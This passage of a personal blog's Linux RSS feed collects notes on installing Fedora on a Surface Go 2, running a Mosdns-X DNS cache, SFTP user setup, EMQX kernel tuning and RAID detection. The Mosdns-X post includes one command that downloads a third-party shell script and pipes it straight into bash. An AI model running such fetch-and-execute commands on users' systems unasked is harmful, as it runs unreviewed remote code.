https://linzeyan.github.io/categories/linux/Recent content in Linux on RickyHugo -- gohugo.ioenThu, 11 Dec 2025 10:18:47 +0800https://linzeyan.github.io/posts/2025/20251211-install-linux-on-surface-go-2/Thu, 11 Dec 2025 10:18:47 +0800https://linzeyan.github.io/posts/2025/20251211-install-linux-on-surface-go-2/<ul> <li><a href="https://ivonblog.com/posts/install-linux-on-surface-go-2/" target="_blank" rel="noopener">How to Install Fedora Linux on Surface Go 2 to Boost Entry-Level Tablet Performance</a> <blockquote> <p>Surface Go 2 (Intel Pentium 4425Y, 4G/64G) WiFi edition</p> <p>For Surface Go 2 hardware support, see this GitHub table: <a href="https://github.com/linux-surface/linux-surface/wiki/Supported-Devices-and-Features#feature-matrix" target="_blank" rel="noopener">Supported Devices and Features</a></p></blockquote> </li> </ul> <h3 id="create-a-linux-boot-drive">Create a Linux boot drive</h3> <ul> <li>Download the ISO from the <a href="https://www.fedoraproject.org/kde/" target="_blank" rel="noopener">Fedora KDE</a> official site.</li> <li>Use <a href="https://ivonblog.com/posts/ventoy-linux-installation/" target="_blank" rel="noopener">Ventoy</a> to create a boot drive.</li> <li>Surface Go 2 only has Type-C ports, so you may need a hub. It cannot boot from an SD card.</li> </ul> <h3 id="install-linux">Install Linux</h3> <ul> <li>Shut down the Surface Go 2.</li> <li>Hold the power button and volume up to enter UEFI. The interface is touch-capable, but you may still need a physical keyboard for installation.</li> <li>Fedora supports Secure Boot, but it is recommended to disable it to avoid manual signing when installing drivers.</li> <li>Set the boot order to the USB drive.</li> <li>Boot and follow the installer. Choose to wipe the disk and install Fedora.</li> <li>For Chinese input, install Fcitx5: <ul> <li><code>sudo dnf install fcitx5 fcitx5-chewing fcitx5-gtk3 fcitx5-gtk4 fcitx5-qt fcitx5-qt6 fcitx5-configtool</code></li> </ul> </li> <li>Tip: Fedora enables zRAM by default. If the Surface Go has limited RAM, edit <code>/etc/systemd/zram-generator.conf</code> to increase SWAP size (MB). <ul> <li><code>[zram0]</code></li> <li><code>zram-size = 8192</code></li> </ul> </li> </ul> <h3 id="install-the-linux-surface-kernel">Install the linux-surface kernel</h3> <ul> <li>Follow the <a href="https://github.com/linux-surface/linux-surface/wiki/Installation-and-Setup" target="_blank" rel="noopener">GitHub</a> instructions. On Fedora, add the linux-surface repo to the system: <ul> <li><code>sudo dnf config-manager addrepo --from-repofile=https://pkg.surfacelinux.com/fedora/linux-surface.repo</code></li> </ul> </li> <li>Install the linux-surface kernel and reboot: <ul> <li><code>sudo dnf install --allowerasing kernel-surface iptsd libwacom-surface</code></li> </ul> </li> <li>Use <code>uname -a</code> to verify the kernel is switched; it should show <code>linux-surface</code>.</li> <li>Fedora updates kernels frequently, so new kernels may override the linux-surface kernel. After installing the linux-surface packages, the <code>linux-surface-default-watchdog.path</code> service is enabled automatically to ensure linux-surface is used on boot.</li> </ul> <h3 id="using-the-virtual-keyboard-on-kde">Using the virtual keyboard on KDE</h3> <p>Enable it in System Settings → Keyboard → Virtual Keyboard. Note that this keyboard cannot be used with Fcitx5.</p>https://linzeyan.github.io/posts/2025/20251109-mosdns-x/Sun, 09 Nov 2025 20:32:00 +0800https://linzeyan.github.io/posts/2025/20251109-mosdns-x/<ul> <li><a href="https://github.com/pmkol/mosdns-x" target="_blank" rel="noopener">Mosdns-X</a></li> <li><a href="https://blog.ibytebox.com/archives/OxpX7FQ1" target="_blank" rel="noopener">Make DNS faster and cleaner on Linux: Deploy Mosdns-X</a></li> </ul> <h3 id="install">install</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>bash &lt;<span style="color:#f92672">(</span>curl -sL https://raw.githubusercontent.com/lidebyte/bashshell/refs/heads/main/mosdns-x-manager.sh<span style="color:#f92672">)</span> </span></span></code></pre></div><h3 id="config">config</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>sudo tee /etc/mosdns-x/config.yaml &gt; /dev/null <span style="color:#e6db74">&lt;&lt;&#39;EOF&#39; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"># mosdns-x concurrent query (no split routing) config </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">log: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> level: info </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> file: /var/log/mosdns-x/mosdns-x.log </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">plugins: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> # Cache plugin </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> - tag: cache </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> type: cache </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> args: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> size: 1024 </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> lazy_cache_ttl: 1800 </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> # Concurrent upstreams: take the first usable answer </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> - tag: forward_all </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> type: fast_forward </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> args: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> upstream: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> # AliDNS </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> - addr: &#34;udp://223.5.5.5&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> - addr: &#34;tls://dns.alidns.com&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> # DNSPod / doh.pub </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> - addr: &#34;udp://119.29.29.29&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> - addr: &#34;tls://dot.pub&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> # Cloudflare </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> - addr: &#34;udp://1.1.1.1&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> - addr: &#34;tls://cloudflare-dns.com&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> # Google </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> - addr: &#34;udp://8.8.8.8&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> - addr: &#34;tls://dns.google&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> # Main pipeline: small cache -&gt; concurrent selection </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> - tag: main </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> type: sequence </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> args: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> exec: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> - cache </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> - forward_all </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"># Listen on dual-stack UDP/TCP 53 </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">servers: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> - exec: main </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> listeners: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> - addr: :53 </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> protocol: udp </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> - addr: :53 </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> protocol: tcp </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">EOF</span> </span></span></code></pre></div><h3 id="systemd">systemd</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>sudo tee /etc/systemd/system/mosdns.service &gt; /dev/null <span style="color:#e6db74">&lt;&lt;&#39;EOF&#39; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">[Unit] </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">Description=Mosdns-X DNS Accelerator </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">After=network.target </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">[Service] </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">Type=simple </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">User=root </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">Group=root </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">ExecStart=/usr/local/bin/mosdns-x start --as-service -d /usr/local/bin -c /etc/mosdns-x/config.yaml </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">Restart=always </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">RestartSec=5 </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">StandardOutput=journal </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">StandardError=journal </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">SyslogIdentifier=mosdns </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">[Install] </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">WantedBy=multi-user.target </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">EOF</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>sudo systemctl daemon-reload </span></span><span style="display:flex;"><span>sudo systemctl enable --now mosdns </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Backup system DNS</span> </span></span><span style="display:flex;"><span>sudo cp -n /etc/resolv.conf /etc/resolv.conf.mosdns-backup </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Switch to local Mosdns-X</span> </span></span><span style="display:flex;"><span>echo -e <span style="color:#e6db74">&#34;nameserver 127.0.0.1\noptions edns0&#34;</span> | sudo tee /etc/resolv.conf </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># If port 53 is occupied by systemd-resolved, disable it</span> </span></span><span style="display:flex;"><span>sudo systemctl disable --now systemd-resolved 2&gt;/dev/null <span style="color:#f92672">||</span> true </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># If you also want to lock it (prevent DHCP changes), run chattr too:</span> </span></span><span style="display:flex;"><span>echo -e <span style="color:#e6db74">&#34;nameserver 127.0.0.1\n&#34;</span> &gt; /etc/resolv.conf <span style="color:#f92672">&amp;&amp;</span> chattr +i /etc/resolv.conf </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Check process status</span> </span></span><span style="display:flex;"><span>sudo systemctl status mosdns --no-pager </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Test resolution speed (second run should hit cache)</span> </span></span><span style="display:flex;"><span>dig +stats www.google.com </span></span><span style="display:flex;"><span>dig +stats www.baidu.com </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># View logs in real time</span> </span></span><span style="display:flex;"><span>tail -f /var/log/mosdns-x/mosdns-x.log </span></span></code></pre></div>https://linzeyan.github.io/posts/2025/20250903-linux-docker-nftables/Wed, 03 Sep 2025 09:03:00 +0800https://linzeyan.github.io/posts/2025/20250903-linux-docker-nftables/<ul> <li><a href="https://blog.ibytebox.com/archives/docker-rong-qi-wu-fa-fang-wen-wai-wang-nftables-xia-de-nat-pei-zhi-zhi-nan" target="_blank" rel="noopener">Docker Containers Can&rsquo;t Access the Internet? NAT Configuration Guide for nftables</a></li> </ul>https://linzeyan.github.io/posts/2025/20250902-linux-cpu-performance/Tue, 02 Sep 2025 08:24:00 +0800https://linzeyan.github.io/posts/2025/20250902-linux-cpu-performance/<ul> <li><a href="https://blog.ibytebox.com/archives/02cf4c4a-0af7-43f1-bb65-ccdb54a52306" target="_blank" rel="noopener">Dedicated Server CPU Frequency Maximization Guide</a></li> </ul> <h2 id="check-which-cpu-mode-is-in-use">Check which CPU mode is in use</h2> <p>Prerequisites System: Linux (Debian, Ubuntu, Proxmox, etc.)</p> <p>Privileges: root</p> <p>CPU: supports dynamic frequency scaling (Intel Xeon, AMD EPYC / Ryzen, etc.)</p> <h3 id="governor">governor</h3> <p><code>cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor</code></p> <ul> <li>powersave: low-power mode (locked low frequency, power-saving but weak)</li> <li>ondemand: on-demand boost (only boosts when needed, may respond a bit slowly)</li> <li>performance: full performance (this is what we want)</li> </ul> <h3 id="check-which-driver-the-kernel-uses-intel--amd">Check which driver the kernel uses (Intel / AMD)</h3> <p><code>cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_driver</code></p>https://linzeyan.github.io/posts/2025/20250801-linuxserver.io/Fri, 01 Aug 2025 15:52:00 +0800https://linzeyan.github.io/posts/2025/20250801-linuxserver.io/<ul> <li><a href="https://ivonblog.com/posts/linuxserver-io-docker-applications/" target="_blank" rel="noopener">Use LinuxServer.io Docker Images to Turn Desktop Apps into Web Apps</a></li> <li><a href="https://www.linuxserver.io/our-images" target="_blank" rel="noopener">LinuxServer.io Official Site</a></li> </ul>https://linzeyan.github.io/posts/2024/20240820-linux/Tue, 20 Aug 2024 12:38:00 +0800https://linzeyan.github.io/posts/2024/20240820-linux/<ul> <li><a href="https://www.freecodecamp.org/news/lightweight-linux-distributions-for-your-pc/" target="_blank" rel="noopener">lightweight-linux-distributions-for-your-pc</a></li> </ul> <table> <thead> <tr> <th>Name</th> <th>Site</th> <th>Comment</th> </tr> </thead> <tbody> <tr> <td>Puppy Linux</td> <td><a href="https://puppylinux-woof-ce.github.io/" target="_blank" rel="noopener">https://puppylinux-woof-ce.github.io/</a></td> <td>This tiny OS weighs in at under 300MB, so it can run smoothly even on systems with as little as 512MB of RAM.</td> </tr> <tr> <td>Bodhi Linux</td> <td><a href="https://www.bodhilinux.com/" target="_blank" rel="noopener">https://www.bodhilinux.com/</a></td> <td>System requirements are just 512MB of RAM and a 500MHz processor.</td> </tr> <tr> <td>Peppermint OS</td> <td><a href="https://peppermintos.com/" target="_blank" rel="noopener">https://peppermintos.com/</a></td> <td>It only needs 512MB of RAM to run, so it will fly on that Pentium 4 machine or Core 2 Duo laptop you have stashed in your closet. While Peppermint OS is light on local resources, it integrates well with cloud and web apps. The OS builds in close integration with services like Dropbox, Google Drive, and more.</td> </tr> <tr> <td>AntiX</td> <td><a href="https://antixlinux.com/" target="_blank" rel="noopener">https://antixlinux.com/</a></td> <td>AntiX is designed to run on systems with as little as 64MB of RAM and a Pentium II processor.</td> </tr> <tr> <td>Lubuntu</td> <td><a href="https://lubuntu.me/" target="_blank" rel="noopener">https://lubuntu.me/</a></td> <td>Lubuntu will run smoothly on computers with as little as 512 MB of RAM and a 1 GHz processor.</td> </tr> </tbody> </table>https://linzeyan.github.io/posts/2023/20231130-sftp/Thu, 30 Nov 2023 17:22:00 +0800https://linzeyan.github.io/posts/2023/20231130-sftp/<h1 id="add-sftp-user-and-share-directory">Add SFTP user and share directory</h1> <p>dev_test_user, qa_test_user 同權限 dev_user, qa_user 同權限</p> <h2 id="1-建立共享資料夾sftp-使用的資料夾">1. 建立共享資料夾(SFTP 使用的資料夾)</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>sudo mkdir -p /home/<span style="color:#f92672">{</span>test,prod<span style="color:#f92672">}</span>/<span style="color:#f92672">{</span>exchange,upload<span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span>sudo mkdir -p /home/<span style="color:#f92672">{</span>test,prod<span style="color:#f92672">}</span>/exchange/success </span></span><span style="display:flex;"><span>sudo mkdir -p /home/<span style="color:#f92672">{</span>test,prod<span style="color:#f92672">}</span>/upload/backup </span></span></code></pre></div><h2 id="2-建立使用者群組">2. 建立使用者群組</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>sudo groupadd share01-test </span></span><span style="display:flex;"><span>sudo groupadd share01-prod </span></span></code></pre></div><h2 id="3-創建-qa_test_user-使用者並設定-qa_test_user-使用者的群組為-share01-test">3. 創建 qa_test_user 使用者並設定 qa_test_user 使用者的群組為 share01-test</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>sudo useradd -m -G share01-test qa_test_user </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># 設定 dev_test_user 使用者的群組為 share01-test</span> </span></span><span style="display:flex;"><span>sudo usermod -G share01-test dev_test_user </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># 設定密碼</span> </span></span><span style="display:flex;"><span>sudo passwd qa_test_user </span></span></code></pre></div><h2 id="4-創建-qa_user-使用者並設定-qa_user-使用者的群組為-share01-prod">4. 創建 qa_user 使用者並設定 qa_user 使用者的群組為 share01-prod</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>sudo useradd -m -G share01-prod qa_user </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># 設定 dev_user 使用者的群組為 share01-prod</span> </span></span><span style="display:flex;"><span>sudo usermod -G share01-prod dev_user </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># 設定密碼</span> </span></span><span style="display:flex;"><span>sudo passwd qa_user </span></span></code></pre></div><h2 id="5-設定權限">5. 設定權限</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># 設定 /home/test 資料夾(含下級資料夾)的使用者為 qa_test_user，群組為 share01-test</span> </span></span><span style="display:flex;"><span>sudo chown -R qa_test_user:share01-test test/ </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># 設定 /home/prod 資料夾(含下級資料夾)的使用者為 qa_user，群組為 share01-prod</span> </span></span><span style="display:flex;"><span>sudo chown -R qa_user:share01-prod prod/ </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># SFTP 登入資料夾權限要給 root</span> </span></span><span style="display:flex;"><span>sudo chown root:root /home/test </span></span><span style="display:flex;"><span>sudo chown root:root /home/prod </span></span></code></pre></div><h2 id="6-設定-etcsshsshd_config">6. 設定 /etc/ssh/sshd_config</h2> <p><code>/etc/ssh/sshd_config</code></p>https://linzeyan.github.io/posts/2023/20231004-container/Wed, 04 Oct 2023 09:06:00 +0800https://linzeyan.github.io/posts/2023/20231004-container/<ul> <li><a href="https://securitylabs.datadoghq.com/articles/container-security-fundamentals-part-1/" target="_blank" rel="noopener">Container security fundamentals: Exploring containers as processes</a></li> <li><a href="https://securitylabs.datadoghq.com/articles/container-security-fundamentals-part-2/" target="_blank" rel="noopener">Container security fundamentals part 2: Isolation &amp; namespaces</a></li> <li><a href="https://securitylabs.datadoghq.com/articles/container-security-fundamentals-part-3/" target="_blank" rel="noopener">Container security fundamentals part 3: Capabilities</a></li> <li><a href="https://securitylabs.datadoghq.com/articles/container-security-fundamentals-part-4/" target="_blank" rel="noopener">Container security fundamentals part 4: Cgroups</a></li> <li><a href="https://securitylabs.datadoghq.com/articles/container-security-fundamentals-part-5/" target="_blank" rel="noopener">Container security fundamentals part 5: AppArmor and SELinux</a></li> <li><a href="https://securitylabs.datadoghq.com/articles/container-security-fundamentals-part-6/" target="_blank" rel="noopener">Container security fundamentals part 6: seccomp </a></li> </ul>https://linzeyan.github.io/posts/2023/20230927-mqtt/Wed, 27 Sep 2023 10:36:00 +0800https://linzeyan.github.io/posts/2023/20230927-mqtt/<ul> <li><a href="https://www.infracloud.io/blogs/scale-emqx-one-million-connections-kubernetes/" target="_blank" rel="noopener">Tuning EMQX to Scale to One Million Concurrent Connection on Kubernetes</a></li> <li><a href="https://www.emqx.io/docs/en/v5.2/performance/tune.html#linux-kernel-tuning" target="_blank" rel="noopener">Performance Tuning (Linux)</a></li> <li><a href="https://www.facebook.com/technologynoteniu/posts/pfbid02ntZshJdTEHLhnkb4hATadU8qGdzB45T2AdmCqtx73oegqrCLNRTKJwkYNZkVNLMsl" target="_blank" rel="noopener">矽谷牛的耕田筆記</a></li> </ul> <h3 id="linux-kernel-tuning">Linux Kernel Tuning</h3> <ul> <li>node level, basically the non-namespaced sysctls</li> </ul> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Sets the maximum number of file handles allowed by the kernel</span> </span></span><span style="display:flex;"><span>sysctl -w fs.file-max<span style="color:#f92672">=</span><span style="color:#ae81ff">2097152</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Sets the maximum number of open file descriptors that a process can have</span> </span></span><span style="display:flex;"><span>sysctl -w fs.nr_open<span style="color:#f92672">=</span><span style="color:#ae81ff">2097152</span> </span></span></code></pre></div><ul> <li>namespaced sysctls</li> </ul> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Sets the maximum number of connections that can be queued for acceptance by the kernel.</span> </span></span><span style="display:flex;"><span>sysctl -w net.core.somaxconn<span style="color:#f92672">=</span><span style="color:#ae81ff">32768</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Sets the maximum number of SYN requests that can be queued by the kernel</span> </span></span><span style="display:flex;"><span>sysctl -w net.ipv4.tcp_max_syn_backlog<span style="color:#f92672">=</span><span style="color:#ae81ff">16384</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Setting the minimum, default and maximum size of TCP Buffer</span> </span></span><span style="display:flex;"><span>sysctl -w net.ipv4.tcp_rmem<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;1024 4096 16777216&#39;</span> </span></span><span style="display:flex;"><span>sysctl -w net.ipv4.tcp_wmem<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;1024 4096 16777216&#39;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Setting Parameters for TCP Connection Tracking</span> </span></span><span style="display:flex;"><span>sysctl -w net.netfilter.nf_conntrack_tcp_timeout_time_wait<span style="color:#f92672">=</span><span style="color:#ae81ff">30</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Controls the maximum number of entries in the TCP time-wait bucket table</span> </span></span><span style="display:flex;"><span>sysctl -w net.ipv4.tcp_max_tw_buckets<span style="color:#f92672">=</span><span style="color:#ae81ff">1048576</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Controls Timeout for FIN-WAIT-2 Sockets:</span> </span></span><span style="display:flex;"><span>sysctl -w net.ipv4.tcp_fin_timeout<span style="color:#f92672">=</span><span style="color:#ae81ff">15</span> </span></span></code></pre></div><ul> <li>There are some more namespaced sysctls that will improve the performance but because of an active issue we are not able to set them on the container level</li> </ul> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Sets the size of the backlog queue for the network device</span> </span></span><span style="display:flex;"><span>sysctl -w net.core.netdev_max_backlog<span style="color:#f92672">=</span><span style="color:#ae81ff">16384</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Amount of memory that is allocated for storing incoming and outgoing data for a socket</span> </span></span><span style="display:flex;"><span>sysctl -w net.core.rmem_default<span style="color:#f92672">=</span><span style="color:#ae81ff">262144</span> </span></span><span style="display:flex;"><span>sysctl -w net.core.wmem_default<span style="color:#f92672">=</span><span style="color:#ae81ff">262144</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Setting the maximum amount of memory for the socket buffers</span> </span></span><span style="display:flex;"><span>sysctl -w net.core.rmem_max<span style="color:#f92672">=</span><span style="color:#ae81ff">16777216</span> </span></span><span style="display:flex;"><span>sysctl -w net.core.wmem_max<span style="color:#f92672">=</span><span style="color:#ae81ff">16777216</span> </span></span><span style="display:flex;"><span>sysctl -w net.core.optmem_max<span style="color:#f92672">=</span><span style="color:#ae81ff">16777216</span> </span></span></code></pre></div><h3 id="erlang-vm-tuning">Erlang VM Tuning</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e">## Erlang Process Limit</span> </span></span><span style="display:flex;"><span>node.process_limit <span style="color:#f92672">=</span> <span style="color:#ae81ff">2097152</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e">## Sets the maximum number of simultaneously existing ports for this system</span> </span></span><span style="display:flex;"><span>node.max_ports <span style="color:#f92672">=</span> <span style="color:#ae81ff">2097152</span> </span></span></code></pre></div><h3 id="emqx-broker-tuning">EMQX Broker Tuning</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#75715e"># Other configuration…</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">EMQX_LISTENER__TCP__EXTERNAL</span>: <span style="color:#e6db74">&#34;0.0.0.0:1883&#34;</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">EMQX_LISTENER__TCP__EXTERNAL__ACCEPTORS</span>: <span style="color:#ae81ff">64</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">EMQX_LISTENER__TCP__EXTERNAL__MAX_CONNECTIONS</span>: <span style="color:#ae81ff">1024000</span> </span></span></code></pre></div>https://linzeyan.github.io/posts/2023/20230412-all-about-mtu-and-mss/Wed, 12 Apr 2023 12:48:12 +0800https://linzeyan.github.io/posts/2023/20230412-all-about-mtu-and-mss/<ul> <li><a href="https://www.kawabangga.com/posts/4983" target="_blank" rel="noopener">Everything About MTU and MSS</a></li> </ul>https://linzeyan.github.io/posts/2022/20221128-raid-information-command-line/Mon, 28 Nov 2022 15:36:27 +0800https://linzeyan.github.io/posts/2022/20221128-raid-information-command-line/<ul> <li><a href="https://www.baeldung.com/linux/raid-information-command-line" target="_blank" rel="noopener">How to Detect RAID Information in Linux</a></li> </ul> <h5 id="lspci">lspci</h5> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>lspci | grep RAID </span></span><span style="display:flex;"><span>00:1f.2 RAID bus controller: Intel Corporation <span style="color:#ae81ff">82801</span> Mobile SATA Controller <span style="color:#f92672">[</span>RAID mode<span style="color:#f92672">]</span> <span style="color:#f92672">(</span>rev 04<span style="color:#f92672">)</span> </span></span></code></pre></div><h5 id="lshw">lshw</h5> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>lshw -class storage </span></span><span style="display:flex;"><span> *-raid </span></span><span style="display:flex;"><span> description: RAID bus controller </span></span><span style="display:flex;"><span> product: <span style="color:#ae81ff">82801</span> Mobile SATA Controller <span style="color:#f92672">[</span>RAID mode<span style="color:#f92672">]</span> </span></span><span style="display:flex;"><span> vendor: Intel Corporation </span></span><span style="display:flex;"><span> physical id: 1f.2 </span></span><span style="display:flex;"><span> bus info: pci@0000:00:1f.2 </span></span><span style="display:flex;"><span> logical name: scsi0 </span></span><span style="display:flex;"><span> version: <span style="color:#ae81ff">04</span> </span></span><span style="display:flex;"><span> width: <span style="color:#ae81ff">32</span> bits </span></span><span style="display:flex;"><span> clock: 66MHz </span></span><span style="display:flex;"><span> capabilities: raid msi pm bus_master cap_list emulated </span></span><span style="display:flex;"><span> configuration: driver<span style="color:#f92672">=</span>ahci latency<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> </span></span><span style="display:flex;"><span> resources: irq:26 ioport:f0d0<span style="color:#f92672">(</span>size<span 